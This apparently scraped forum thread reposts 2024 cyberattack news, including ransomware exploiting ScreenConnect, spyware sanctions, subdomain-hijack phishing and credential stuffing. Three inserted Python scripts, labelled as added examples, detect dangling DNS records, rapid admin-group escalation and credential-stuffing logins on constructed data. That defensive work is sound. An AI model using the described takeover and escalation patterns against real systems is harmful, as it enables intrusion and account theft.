Cyber Attacks and Hacking

User avatar
keith
Posts: 3790
Joined: Mon Feb 22, 2021 10:23 pm
Location: The Swamp in Victorian Oz
Occupation: Retired Computer Systems Analyst Project Manager Super Coder
Verified: ✅lunatic

Cyber Attacks and Hacking

#151

Post by keith »

I doubt that this is related, but my computer ground to a halt a couple of days ago.

Checking out who was using the CPU, I found some DLL that I had never heard of before (not unusual) up in the 90% range. I killed it and we went along smoothly for a while. It did come back after a few minutes. [Sorry, the DLL name escapes me at the moment.]

Dr. Google pointed me at something to do with number crunching of some sort, and I couldn't figure out what the heck it was from. So I just killed it again, even though it wasn't as obnoxious as before.

More interactions with Dr. Google and the DLL started coming up in search results that also included the word BOINC.

Aha! BOINC was running some kind of numerical analysis and it had got well and truly out of control. I don't know if BOINC has been hacked, or they had a bad packet, or a bad project upgrade, but I killed BOINC for the time being.

I haven't made any attempt to contact BOINC about it, and it will probably come back next time I reboot. But I know about it now.
User avatar
RTH10260
Posts: 14805
Joined: Mon Feb 22, 2021 10:16 am
Location: Switzerland, near the Alps
Verified: ✔️ Eurobot

Cyber Attacks and Hacking

#152

Post by RTH10260 »

Note: the above DNSSEC issue will cause problems on the DNS server, not on the user's computer.

#153

Post by RTH10260 »

Pharmacies across US disrupted following hack at Change Healthcare network

By Raphael Satter and Sriparna Roy
February 23, 2024, 4:07 AM GMT+1

WASHINGTON, Feb 22 (Reuters) - Pharmacies across the United States are experiencing disruptions following a hack at UnitedHealth's (UNH.N) technology unit, Change Healthcare, several pharmacy chains said in statements and on social media.

The problems began on Wednesday after a "suspected nation-state associated cybersecurity threat actor" gained access to Change Healthcare's information technology systems, UnitedHealth said in a filing on Thursday.

"Once we became aware of the outside threat, in the interest of protecting our partners and patients, we took immediate action to disconnect our systems to prevent further impact," Change Healthcare said on its status page. The company did not immediately respond to a request for further comment.

In its filing, UnitedHealth said it "cannot estimate the duration or extent of the disruption at this time." It said it had retained security experts and was working with law enforcement.

A variety of pharmacy chains said that the outage at Change Healthcare, a Tennessee-based provider of healthcare billing and data systems and a key node in the U.S. healthcare system, was having knock-on effects on their businesses.



https://www.reuters.com/business/health ... 024-02-22/

#154

Post by RTH10260 »

Hackers Leak 2.5M Private Plane Owners’ Data Linked to LA Intl. Airport Breach
The IntelBroker hacker has claimed responsibility for the breach.

WAQAS
FEBRUARY 23, 2024

IntelBroker informed Hackread.com that they successfully executed the data breach by exploiting a vulnerability within one of the CRM systems utilized by the Los Angeles International Airport.

The notorious hacker known as IntelBroker is making headlines once again with a daring alleged breach targeting one of the United States’ most critical organizations: the Los Angeles International Airport.

In a bold move, IntelBroker claims to have breached the database of the Los Angeles International Airport, making off with a trove of confidential user data belonging to private plane owners – The breach, according to the hacker, took place in February 2024.

It is important to note that no customer or traveller data is involved in this breach. However, the incident has apparently resulted in the compromise of a significant 2.5 million records, including sensitive information such as:
  • Full names
  • CPA numbers
  • Email addresses (1.9 million emails – total 15,8000 emails after removing duplicates)
  • Company names
  • Plane model numbers
  • Tail numbers (refers to an identification number painted on an aircraft's tail)
The breach was publicly disclosed by IntelBroker on the notorious hacker and cybercrime platform Breach Forums, adding another high-profile hack to their already extensive. Notable targets of IntelBroker’s previous hacks include the Weee! Grocery platform, General Electric, Staffing Giant Robert Half, and a recent data leak involving a partial Facebook Marketplace database.

Upon learning of the breach, Hackread.com promptly reached out to IntelBroker, who confirmed their involvement and provided limited insight into their methods. According to IntelBroker, they exploited a vulnerability in the airport’s Customer Relationship Management (CRM) system to gain unauthorized access to the database, highlighting the critical need for organizations to strengthen their cybersecurity measures in the face of growing threats from skilled hackers like IntelBroker.



https://www.hackread.com/hackers-leak-p ... rt-breach/

#155

Post by RTH10260 »

eBay, VMware, McAfee Sites Hijacked in Sprawling Phishing Operation
Trusted brands like The Economist are also among the 8,000 entities compromised by Operation SubdoMailing, which is at the heart of a larger operation of a single threat actor.

Elizabeth Montalbano, Contributing Writer
February 27, 2024

Attackers have compromised more than 8,000 subdomains from well-known brands and institutions to mount a sprawling phishing campaign that sends malicious emails numbering in the millions each day.

MSN, VMware, McAfee, The Economist, Cornell University, CBS, Marvel, and eBay are among the entities caught up in "SubdoMailing" — named by researchers from Guardio Labs who discovered the campaign, which is at the heart of a larger cybercriminal undertaking and undermines the trust and credibility of the compromised organizations, they said.

"The uncovered operation involves the manipulation of thousands of hijacked sub-domains belonging to or affiliated with big brands," head of Guardio Labs-Cybersecurity Nati Tal and security researcher Oleg Zaytsev wrote in a post on the content-sharing platform Medium. "Complex DNS manipulations for these domains allowed the dispatch of vast quantities of spammy and just outright malicious emails, falsely authorized under the guise of internationally recognized brands."

The campaign is crafted in such a way that emails appear to come from trusted domains and bypass all the industry-standard email-security measures typically in place to block suspicious messages, including Sender Policy Framework (SPF), DKIM, SMTP Server, and DMARC, the researchers said.



https://www.darkreading.com/application ... -operation
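An added example, not code from the Dark Reading article or from Guardio Labs. Subdomain hijacks of this kind work because a brand's DNS still references names it no longer controls: a subdomain whose CNAME points at a domain that has since expired, or an SPF record whose include:/redirect= chain references such a domain. Whoever registers the lapsed name inherits the brand's mail authorization. The script below walks a constructed zone snapshot (the brand.example names and records are assumed, not real) and flags both conditions; for a real audit the ZONE table would be replaced with live lookups.

```python
"""Added example, not code from the Dark Reading article or from Guardio Labs.

Checks a DNS snapshot for the two conditions that let an attacker send mail
"from" a brand's subdomain: a CNAME chain ending at a name that no longer
resolves (the target may have expired and be registrable), and an SPF
include:/redirect= chain that references such a name. ZONE is a constructed
snapshot with assumed example names; swap it for live lookups (e.g. dnspython)
to audit a real zone.
"""
import re

# Constructed data (assumption): name -> [(rtype, value), ...].
# Names absent from the table are treated as unresolvable.
ZONE = {
    "brand.example.": [
        ("TXT", "v=spf1 include:_spf.mailer.example include:old-vendor.example -all"),
    ],
    "_spf.mailer.example.": [
        ("TXT", "v=spf1 ip4:192.0.2.0/24 include:_spf2.mailer.example ~all"),
    ],
    "_spf2.mailer.example.": [("TXT", "v=spf1 ip4:198.51.100.0/24 -all")],
    "www.brand.example.": [("CNAME", "brand.example.")],
    "promo.brand.example.": [("CNAME", "campaign.expired-agency.example.")],
    # old-vendor.example and campaign.expired-agency.example are deliberately
    # absent: they stand in for domains that were allowed to lapse.
}

# An SPF term that pulls in another domain's policy, with optional qualifier.
SPF_REF = re.compile(r"^[+\-~?]?(?:include:|redirect=)(\S+)$", re.IGNORECASE)


def fqdn(name):
    """Normalise to an absolute name so table lookups are consistent."""
    return name if name.endswith(".") else name + "."


def lookup(name, rtype):
    return [v for t, v in ZONE.get(fqdn(name), []) if t == rtype]


def spf_record(name):
    """The SPF TXT record published at name, or None if there is none."""
    recs = [r for r in lookup(name, "TXT") if r.lower().startswith("v=spf1")]
    return recs[0] if recs else None


def dangling_spf_includes(domain):
    """Follow include:/redirect= references from domain's SPF record and return
    the referenced names that publish no SPF record at all. Anyone who registers
    such a name can publish "v=spf1 +all" and pass SPF checks for domain."""
    seen, dangling = set(), set()

    def walk(name, depth):
        if depth > 10 or name in seen:      # RFC 7208 lookup limit / loop guard
            return
        seen.add(name)
        rec = spf_record(name)
        if rec is None:
            if depth > 0:                   # root without SPF is a different problem
                dangling.add(name)
            return
        for term in rec.split():
            m = SPF_REF.match(term)
            if m:
                walk(m.group(1), depth + 1)

    walk(domain, 0)
    return sorted(dangling)


def dangling_cnames(names, max_hops=8):
    """Follow each name's CNAME chain; report names whose chain ends at a
    target with no records of any type (a takeover candidate)."""
    findings = {}
    for name in names:
        target, hops = fqdn(name), 0
        while hops < max_hops:
            cn = lookup(target, "CNAME")
            if not cn:
                break
            target, hops = fqdn(cn[0]), hops + 1
        if hops and target not in ZONE:
            findings[fqdn(name)] = target
    return findings


if __name__ == "__main__":
    print("dangling SPF includes:", dangling_spf_includes("brand.example"))
    print("dangling CNAMEs:", dangling_cnames(ZONE))
```

On the constructed snapshot the SPF walk flags old-vendor.example and the CNAME walk flags promo.brand.example pointing at campaign.expired-agency.example; in a real audit, every flagged target should be checked at the registrar for availability, and the stale record removed whether or not it is.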

#156

Post by RTH10260 »

Black Basta, Bl00dy Ransomware Exploiting Recent ScreenConnect Flaws
The Black Basta and Bl00dy ransomware gangs have started exploiting two vulnerabilities in ConnectWise ScreenConnect.

By Ionut Arghire
February 27, 2024

More threat actors have started exploiting two recently resolved vulnerabilities in the ConnectWise ScreenConnect remote desktop access software.

The issues, tracked as CVE-2024-1709 (CVSS score of 10) and CVE-2024-1708 (CVSS score of 8.4), are described as an authentication bypass flaw and a path traversal bug.

ConnectWise disclosed the security defects on February 19, when it announced patches for them. Two days later, the company updated its advisory to warn of ongoing exploitation.

“Essentially, a bad actor could mimic the role as system admin, delete all other users and take over the instance,” the company notes in its advisory.

A proof-of-concept (PoC) exploit targeting the flaws, collectively referred to as SlashAndGrab, was made public last week, and threat actors quickly started exploiting them for malware delivery.

Now, Trend Micro says that more cybercrime groups have started exploiting the flaws, including the Black Basta and Bl00dy ransomware groups.

Following initial access to vulnerable servers, Black Basta was seen performing reconnaissance, discovery, and elevation of privilege activities, and deploying Cobalt Strike payloads.

In addition to searching for members of the ‘domain admin’ group, the attackers also added new accounts to the administrator group and deployed scripts to identify machines that recently connected to the Active Directory environment.



https://www.securityweek.com/black-bast ... ect-flaws/
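An added example, not code from the SecurityWeek article or from Trend Micro. Two of the post-exploitation steps attributed to Black Basta above, creating accounts and adding them to administrator groups, leave Windows Security log events behind: 4720 (user account created), 4732 (member added to a local security group such as Administrators) and 4728 (member added to a global group such as Domain Admins). The script below reads such events in a JSON-lines form and raises two alerts: a brand-new account promoted to a privileged group within minutes, and any privileged-group change made by a subject outside an allowlist. The SAMPLE_EVENTS are constructed, and the field names are an assumed normalisation rather than any real forwarder's schema.

```python
"""Added example, not code from the SecurityWeek article or from Trend Micro.

Detects the "create account, make it admin" pattern described above from
Windows Security events 4720 / 4728 / 4732, read as JSON lines. SAMPLE_EVENTS
is constructed and the field names (time, id, subject, target, group) are an
assumed normalisation, not a real forwarder's schema.
"""
import json
from datetime import datetime, timedelta

USER_CREATED = 4720
GROUP_ADD_EVENTS = {4728, 4732}   # member added to global / local security group
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}

# Constructed sample (assumption): one event per line.
SAMPLE_EVENTS = """\
{"time": "2024-02-22T03:10:05Z", "id": 4720, "subject": "svc_backup", "target": "Administrator2", "group": null}
{"time": "2024-02-22T03:10:41Z", "id": 4732, "subject": "svc_backup", "target": "Administrator2", "group": "Administrators"}
{"time": "2024-02-22T03:11:02Z", "id": 4728, "subject": "svc_backup", "target": "Administrator2", "group": "Domain Admins"}
{"time": "2024-02-22T09:00:00Z", "id": 4732, "subject": "jsmith", "target": "helpdesk01", "group": "Remote Desktop Users"}
{"time": "2024-02-22T09:30:00Z", "id": 4720, "subject": "jsmith", "target": "newhire", "group": null}
{"time": "2024-02-23T11:00:00Z", "id": 4732, "subject": "jsmith", "target": "newhire", "group": "Administrators"}
"""


def parse_events(text):
    """Parse JSON lines into dicts with a datetime 'time', sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["time"] = datetime.strptime(e["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["time"])


def fast_admin_escalations(events, window=timedelta(minutes=30)):
    """Accounts added to a privileged group within `window` of being created.
    Returns (target, group, subject) tuples in time order."""
    created = {}
    alerts = []
    for e in events:
        if e["id"] == USER_CREATED:
            created[e["target"]] = e["time"]
        elif e["id"] in GROUP_ADD_EVENTS and e["group"] in PRIVILEGED_GROUPS:
            t0 = created.get(e["target"])
            if t0 is not None and e["time"] - t0 <= window:
                alerts.append((e["target"], e["group"], e["subject"]))
    return alerts


def unexpected_grantors(events, allowed_subjects):
    """Privileged-group additions performed by a subject not on the allowlist.
    Returns (subject, target, group) tuples."""
    return [
        (e["subject"], e["target"], e["group"])
        for e in events
        if e["id"] in GROUP_ADD_EVENTS
        and e["group"] in PRIVILEGED_GROUPS
        and e["subject"] not in allowed_subjects
    ]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for a in fast_admin_escalations(evs):
        print("new account promoted quickly:", a)
    for a in unexpected_grantors(evs, allowed_subjects={"jsmith"}):
        print("privileged change by non-allowlisted subject:", a)
```

The 30-minute window is a tuning choice: a real onboarding (newhire, created one day and promoted the next) stays quiet, while an account promoted to Administrators and Domain Admins within a minute of creation, by a service account that should never manage groups, trips both rules.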

#157

Post by RTH10260 »

US Sanctions Spyware Company and Executives Who Targeted American Journalists, Government Officials
The Treasury Department sanctioned individuals associated with Intellexa Consortium, maker of the powerful Predator Spyware.

By Associated Press
March 5, 2024

The Treasury Department announced Tuesday it has sanctioned two people and a Greece-based commercial spyware company headed by a former Israeli military officer that developed, operated and distributed technology used to target U.S. government officials, journalists and policy experts.

The sanctions target Intellexa Consortium, which the U.S. says has sold and distributed commercial spyware and surveillance tools for targeted and mass surveillance campaigns. Other entities associated with Intellexa — including North Macedonia-based Cytrox AD, Hungary-based Cytrox Holdings ZRT and Ireland-based Thalestris Limited — were sanctioned for their parts in developing and distributing a package of tools known as Predator.

Biden administration officials said it marks the first time that the Treasury Department has sanctioned people or entities for the misuse of spyware.

Predator allows a user to infiltrate electronic devices through zero-click attacks that require no user interaction for the spyware to infect the device. The spyware, which has been used in dozens of countries, has allowed for the unauthorized extraction of data, geolocation tracking and access to personal information on compromised devices.

“Today’s actions represent a tangible step forward in discouraging the misuse of commercial surveillance tools, which increasingly present a security risk to the United States and our citizens,” said Brian Nelson, Treasury undersecretary for terrorism and financial intelligence. “The United States remains focused on establishing clear guardrails for the responsible development and use of these technologies while also ensuring the protection of human rights and civil liberties of individuals around the world.”

The Commerce Department last year blacklisted Intellexa and Cytrox, denying them access to U.S. technology.

Amnesty International’s Security Lab in October published a report that said that Predator had been used to target but not necessarily infect devices connected to the president of the European Parliament, Roberta Metsola, and the president of Taiwan, Tsai Ing-Wen, as well as Rep. Michael McCaul, R-Texas, and Sen. John Hoeven, R-N.D.

Europe has also suffered a number of spyware incidents. Predator spyware was reportedly used in Greece, a revelation that helped precipitate the resignation in 2022 of two top government officials, including the national intelligence director.



https://www.securityweek.com/us-sanctio ... officials/

#158

Post by RTH10260 »

American Express Warns Credit Card Data Exposed in Third-Party Breach

5 MAR 2024
James Coker Deputy Editor, Infosecurity Magazine


American Express (Amex) has alerted customers that their credit card details may have been compromised following a third-party data breach.

In a notice letter to customers, filed with the US State of Massachusetts, the credit card provider warned that current or previously issued Amex card account numbers, customer names, and other card details such as the expiration date, may have been accessed in the attack.

The firm added that customers may receive additional notification letters if more than one of their Amex accounts were involved.

It is currently unknown how many customers may have been impacted by the incident.

The State of Massachusetts’ 2024 Data Breach Notification Report shows numerous third-party incidents reported by American Express in late February involving compromised credit card details.

Altogether, these add up to 33 impacted citizens from the state.



https://www.infosecurity-magazine.com/n ... a-exposed/

#159

Post by RTH10260 »

When the protectors themselves get hacked
CISA forced to take two systems offline last month after Ivanti compromise

Jonathan Greig, Suzanne Smalley
March 8th, 2024

Hackers breached the systems of the Cybersecurity and Infrastructure Security Agency (CISA) in February through vulnerabilities in Ivanti products, officials said.

A CISA spokesperson confirmed to Recorded Future News that the agency “identified activity indicating the exploitation of vulnerabilities in Ivanti products the agency uses” about a month ago.

“The impact was limited to two systems, which we immediately took offline. We continue to upgrade and modernize our systems, and there is no operational impact at this time,” the spokesperson said.

“This is a reminder that any organization can be affected by a cyber vulnerability and having an incident response plan in place is a necessary component of resilience.”

CISA declined to answer a range of questions about who was behind the incident, whether data had been accessed or stolen and what systems were taken offline. Ivanti makes software that organizations use to manage IT, including security and system access.

A source with knowledge of the situation told Recorded Future News that the two systems compromised were the Infrastructure Protection (IP) Gateway, which houses critical information about the interdependency of U.S. infrastructure, and the Chemical Security Assessment Tool (CSAT), which houses private sector chemical security plans. CISA declined to confirm or deny whether these are the systems that were taken offline.

CSAT houses some of the country’s most sensitive industrial information, including the Top Screen tool for high-risk chemical facilities, Site Security Plans and the Security Vulnerability Assessments.

CISA said organizations should review an advisory the agency released on February 29 warning that threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways including CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893.

Last week, several of the world’s leading cybersecurity agencies revealed that hackers had discovered a way around a tool Ivanti released to help organizations check if they had been compromised.



https://therecord.media/cisa-takes-two- ... compromise

#160

Post by RTH10260 »

Same, based on the above article:
Top US cybersecurity agency hacked and forced to take some systems offline

Sean Lyngaas
Published 7:37 PM EST, Fri March 8, 2024

CNN — A federal agency in charge of cybersecurity discovered it was hacked last month and was forced to take two key computer systems offline, an agency spokesperson and US officials familiar with the incident told CNN.

One of the US Cybersecurity and Infrastructure Security Agency’s affected systems runs a program that allows federal, state and local officials to share cyber and physical security assessment tools, according to the US officials briefed on the matter. The other holds information on security assessment of chemical facilities, the sources said.

A CISA spokesperson said in a statement that “there is no operational impact at this time” from the incident and that the agency continues to “upgrade and modernize our systems.”

“This is a reminder that any organization can be affected by a cyber vulnerability and having an incident response plan in place is a necessary component of resilience,” the spokesperson said, adding that the impact from the hack “was limited to two systems, which we immediately took offline.”

The two systems run on older technology that was already set to be replaced, sources told CNN.

Part of the Department of Homeland Security, CISA investigates cyber intrusions at federal agencies and advises private critical infrastructure firms on how to bolster their security.

The Record first reported on the hack.

It was not immediately clear who was behind the hack, but it occurred through vulnerabilities in popular virtual private networking software made by Utah-based IT firm Ivanti. For several weeks, CISA has urged federal agencies and private firms to update their software or take other defensive measures in response to widespread exploitation of Ivanti vulnerabilities by hackers.

Among the hackers exploiting the flaws are a Chinese group focused on espionage, private researchers have previously told CNN.

While there is some irony in it, even cybersecurity agencies or officials can be victims of hacking. After all, they rely on the same technology that others do. The US’ top cybersecurity diplomat Nate Fick said last year that his personal account on social media platform X was hacked, calling it part of the “perils of the job.”



https://edition.cnn.com/2024/03/08/poli ... index.html

#161

Post by RTH10260 »

when the bad guys go really bad and turn on their own buddies ...
Incognito Darknet Market Mass-Extorts Buyers, Sellers

March 11, 2024

Borrowing from the playbook of ransomware purveyors, the darknet narcotics bazaar Incognito Market has begun extorting all of its vendors and buyers, threatening to publish cryptocurrency transaction and chat records of users who refuse to pay a fee ranging from $100 to $20,000. The bold mass extortion attempt comes just days after Incognito Market administrators reportedly pulled an “exit scam” that left users unable to withdraw millions of dollars worth of funds from the platform.

In the past 24 hours, the homepage for the Incognito Market was updated to include a blackmail message from its owners, saying they will soon release purchase records of vendors who refuse to pay to keep the records confidential.

“We got one final little nasty surprise for y’all,” reads the message to Incognito Market users. “We have accumulated a list of private messages, transaction info and order details over the years. You’ll be surprised at the number of people that relied on our ‘auto-encrypt’ functionality. And by the way, your messages and transaction IDs were never actually deleted after the ‘expiry’….SURPRISE SURPRISE!!! Anyway, if anything were to leak to law enforcement, I guess nobody never slipped up.”

Incognito Market says it plans to publish the entire dump of 557,000 orders and 862,000 cryptocurrency transaction IDs at the end of May.

“Whether or not you and your customers’ info is on that list is totally up to you,” the Incognito administrators advised. “And yes, this is an extortion!!!!”

The extortion message includes a “Payment Status” page that lists the darknet market’s top vendors by their handles, saying at the top that “you can see which vendors care about their customers below.” The names in green supposedly correspond to users who have already opted to pay.


Image caption: The “Payment Status” page set up by the Incognito Market extortionists.

Incognito Market said it plans to open up a “whitelist portal” for buyers to remove their transaction records “in a few weeks.”

The mass-extortion of Incognito Market users comes just days after a large number of users reported they were no longer able to withdraw funds from their buyer or seller accounts. The cryptocurrency-focused publication Cointelegraph.com reported Mar. 6 that Incognito was exit-scamming its users out of their bitcoins and Monero deposits.

CoinTelegraph notes that Incognito Market administrators initially lied about the situation, and blamed users’ difficulties in withdrawing funds on recent changes to Incognito’s withdrawal systems.

Incognito Market deals primarily in narcotics, so it’s likely many users are now worried about being outed as drug dealers. Creating a new account on Incognito Market presents one with an ad for 5 grams of heroin selling for $450.



https://krebsonsecurity.com/2024/03/inc ... s-sellers/

#162

Post by RTH10260 »

Never-before-seen Linux malware gets installed using 1-day exploits
Discovery means that NerbianRAT is cross-platform, used by a for-profit threat group.

DAN GOODIN -
3/12/2024, 1:33 AM

Researchers have unearthed Linux malware that circulated in the wild for at least two years before being identified as a credential stealer that’s installed by the exploitation of recently patched vulnerabilities.

The newly identified malware is a Linux variant of NerbianRAT, a remote access Trojan first described in 2022 by researchers at security firm Proofpoint. Last Friday, Checkpoint Research revealed that the Linux version has existed since at least the same year, when it was uploaded to the VirusTotal malware identification site. Checkpoint went on to conclude that Magnet Goblin—the name the security firm uses to track the financially motivated threat actor using the malware—has installed it by exploiting “1-days,” which are recently patched vulnerabilities. Attackers in this scenario reverse engineer security updates, or copy associated proof-of-concept exploits, for use against devices that have yet to install the patches.

Checkpoint also identified MiniNerbian, a smaller version of NerbianRAT for Linux that’s used to backdoor servers running the Magento ecommerce server, primarily for use as command-and-control servers that devices infected by NerbianRAT connect to. Researchers elsewhere have reported encountering servers that appear to have been compromised with MiniNerbian, but Checkpoint Research appears to have been the first to identify the underlying binary.

“Magnet Goblin, whose campaigns appear to be financially motivated, has been quick to adopt 1-day vulnerabilities to deliver their custom Linux malware, NerbianRAT and MiniNerbian,” Checkpoint researchers wrote. “Those tools have operated under the radar as they mostly reside on edge-devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected.”

Checkpoint discovered the Linux malware while researching recent attacks that exploit critical vulnerabilities in Ivanti Connect Secure, which have been under mass exploitation since early January. In the past, Magnet Goblin has installed the malware by exploiting one-day vulnerabilities in Magento, Qlik Sense, and possibly Apache ActiveMQ.

In the course of its investigation into the Ivanti exploitation, Checkpoint found the Linux version of NerbianRAT on compromised servers that were under the control of Magnet Goblin. URLs included:



https://arstechnica.com/security/2024/0 ... -exploits/

#163

Post by RTH10260 »

Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites

Mar 12, 2024
Newsroom, WordPress / Website Security

A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.

According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.

"These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher Puja Srivastava said in a report dated March 7.

Infection sequences involve the exploitation of CVE-2023-6000, a security vulnerability in Popup Builder that could be exploited to create rogue admin users and install arbitrary plugins.

The shortcoming was exploited as part of a Balada Injector campaign earlier this January, compromising no less than 7,000 sites.

The latest set of attacks lead to the injection of malicious code, which comes in two different variants and is designed to redirect site visitors to other sites such as phishing and scam pages.

WordPress site owners are recommended to keep their plugins up-to-date as well as scan their sites for any suspicious code or users, and perform appropriate cleanup.



https://thehackernews.com/2024/03/malwa ... ilder.html

#164

Post by RTH10260 »

Roku cancels unauthorized subscriptions and provides refunds for 15k breached accounts

Jonathan Greig
March 11th, 2024

Roku said it canceled unauthorized subscriptions and refunded more than 15,000 accounts after discovering what they called “suspicious activity.”

The streaming TV giant — which reported $3.4 billion in revenue last year — said that from the end of December to the end of February, hackers used username and password combinations breached from other services to log in to user accounts.

“After gaining access, they then changed the Roku login information for the affected individual Roku accounts, and, in a limited number of cases, attempted to purchase streaming subscriptions,” the company said in breach notification letters.

“However, access to the affected Roku accounts did not provide the unauthorized actors with access to social security numbers, full payment account numbers, dates of birth, or other similar sensitive personal information requiring notification.”

Roku’s security team said that it notified law enforcement but did not wait for the investigation to conclude before taking action. After identifying potentially impacted Roku accounts, the security team forced password resets and investigated the account activity to determine whether the hackers had made any unauthorized charges.

Any charges that were unauthorized were canceled and users were refunded.

The company did not respond to requests for comment about how they were able to distinguish between legitimate charges and ones connected to hacker activity.



https://therecord.media/roku-unauthoriz ... nt-refunds
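An added example, not code from The Record's article or from Roku. The article describes the classic credential-stuffing sequence: breached username/password pairs replayed against the login endpoint, then the account's login details changed and subscriptions bought. Two signals separate that from normal use and can be computed from an ordinary authentication log: one client address attempting many different usernames in a short window, and a successful login followed within minutes by a password or e-mail change from that same address. The script below applies both to a constructed log (the CSV shape is assumed, not Roku's telemetry) and combines them into a list of accounts to force-reset first; the thresholds are assumptions to tune against real volume, and the combination is a heuristic, not Roku's stated method.

```python
"""Added example, not code from The Record's article or from Roku.

Flags credential-stuffing activity in an authentication log: (1) source IPs
trying many distinct accounts in a short window, and (2) accounts whose
password or e-mail was changed shortly after a successful login from the same
IP. LOG is constructed and its CSV shape is an assumption; thresholds are
assumptions to tune against real traffic.
"""
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample (assumption): time, source IP, account, event, result.
LOG = """\
time,ip,user,event,result
2024-02-20T01:00:00Z,203.0.113.7,alice,login,fail
2024-02-20T01:00:03Z,203.0.113.7,bob,login,fail
2024-02-20T01:00:05Z,203.0.113.7,carol,login,success
2024-02-20T01:00:09Z,203.0.113.7,dave,login,fail
2024-02-20T01:00:12Z,203.0.113.7,erin,login,fail
2024-02-20T01:04:00Z,203.0.113.7,carol,password_change,success
2024-02-20T08:00:00Z,198.51.100.9,alice,login,fail
2024-02-20T08:00:20Z,198.51.100.9,alice,login,success
2024-02-20T08:30:00Z,198.51.100.9,alice,email_change,success
"""


def parse_log(text):
    """Parse the CSV into dicts with a datetime 'time', sorted by time."""
    rows = list(csv.DictReader(StringIO(text)))
    for r in rows:
        r["time"] = datetime.strptime(r["time"], "%Y-%m-%dT%H:%M:%SZ")
    return sorted(rows, key=lambda r: r["time"])


def spraying_ips(rows, window=timedelta(minutes=5), min_users=5):
    """IPs that attempted logins for at least `min_users` distinct accounts
    inside any `window`-long span. Returns {ip: peak distinct users}."""
    by_ip = defaultdict(list)
    for r in rows:
        if r["event"] == "login":
            by_ip[r["ip"]].append(r)
    flagged = {}
    for ip, evs in by_ip.items():
        start = 0
        for end, e in enumerate(evs):            # two-pointer sliding window
            while e["time"] - evs[start]["time"] > window:
                start += 1
            users = {x["user"] for x in evs[start:end + 1]}
            if len(users) >= min_users:
                flagged[ip] = max(flagged.get(ip, 0), len(users))
    return flagged


def takeover_candidates(rows, window=timedelta(minutes=10)):
    """Accounts whose credentials were changed within `window` of a successful
    login from the same IP. Returns (user, ip, event) tuples."""
    last_success = {}
    hits = []
    for r in rows:
        key = (r["user"], r["ip"])
        if r["event"] == "login" and r["result"] == "success":
            last_success[key] = r["time"]
        elif r["event"] in {"password_change", "email_change"} and r["result"] == "success":
            t0 = last_success.get(key)
            if t0 is not None and r["time"] - t0 <= window:
                hits.append((r["user"], r["ip"], r["event"]))
    return hits


def accounts_to_reset(rows):
    """Accounts with a credential change from an address that was also
    spraying: the ones to force-reset first (a heuristic, not Roku's method)."""
    bad_ips = spraying_ips(rows)
    return sorted({user for user, ip, _ in takeover_candidates(rows) if ip in bad_ips})


if __name__ == "__main__":
    rows = parse_log(LOG)
    print("spraying IPs:", spraying_ips(rows))
    print("takeover candidates:", takeover_candidates(rows))
    print("reset first:", accounts_to_reset(rows))
```

On the sample, alice's own e-mail change half an hour after a normal login is left alone, while carol's password change four minutes after a success from an address that had just tried five different accounts is flagged; in production the same two signals would be joined with purchase events to decide which charges to refund.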

#165

Post by RTH10260 »

The French Government Says It’s Being Targeted by Unusually Intense Cyberattacks
A group of hackers called Anonymous Sudan, considered by cybersecurity experts as pro-Russia, claimed responsibility for the attacks in online posts.

By Associated Press
March 11, 2024

The French government said Monday that several of its services have been targeted by cyberattacks of “unprecedented intensity,” and a special crisis center was activated to restore online services.

Prime Minister Gabriel Attal’s office said in a statement that the attacks started Sunday night and hit multiple government ministries, without providing details. By Monday afternoon, it said, “the impact of the attacks has been reduced for most services and access to government sites restored.”

A group of hackers called Anonymous Sudan, which is considered by cybersecurity experts as pro-Russia, claimed responsibility for the attacks in online posts. The French prime minister’s office and digital safety agency wouldn’t comment on the claim, or provide details of what was targeted or what damage might have been caused.

A French official said they were denial-of-service attacks, a common type of cyberattack that involves flooding a site with data in order to overwhelm it and knock it offline.

France’s government has made a push to improve cyber defenses before the Paris Olympics this summer and after damaging ransomware attacks in recent years, including on hospitals in 2021.

The French government has accused Russia of operating a long-running online manipulation campaign against Ukraine’s Western backers, including by mirroring the French Foreign Ministry website among other methods. President Emmanuel Macron has taken an increasingly tough line against Moscow and the war that Russian President Vladimir Putin started in Ukraine.



https://www.securityweek.com/the-french ... erattacks/

#166

Post by RTH10260 »

Old stuff, only recently fixed:
Exploited Building Access System Vulnerability Patched 5 Years After Disclosure
Vulnerabilities affecting a Nice Linear physical access product, including an exploited flaw, patched five years after their disclosure.

By Eduard Kovacs
March 12, 2024

Vulnerabilities affecting Linear building access control products, including a security flaw that has been exploited in the wild, have been patched nearly five years after their initial disclosure.

In May 2019, at SecurityWeek’s ICS Cyber Security Conference, Gjoko Krstic, a researcher who at the time worked for industrial cybersecurity firm Applied Risk, disclosed information on more than 100 vulnerabilities found in building management and access control systems from Nortek, Prima Systems, Optergy, and Computrols.


https://www.securityweek.com/exploited- ... isclosure/

#167

Post by RTH10260 »

Even the IT industry leader needs to fix its stuff:
Microsoft Discloses Critical Hyper-V Flaws in Low-Volume Patch Update
Microsoft has disclosed fewer flaws and zero-days in the first three months of 2024 compared with the first quarter of the prior four years.

Jai Vijayan, Contributing Writer
March 12, 2024

Microsoft issued patches for 60 unique CVEs in its Patch Tuesday security update for March, only two of which are rated as "critical" and needing priority attention. Both affect the Windows Hyper-V virtualization technology: CVE-2024-21407, a remote code execution (RCE) bug; and CVE-2024-21408, which is a denial-of-service (DoS) vulnerability.

The update includes fixes for a total of 18 RCE flaws and two dozen elevation-of-privilege vulnerabilities, some of which allow threat actors to gain administrative control of affected systems.

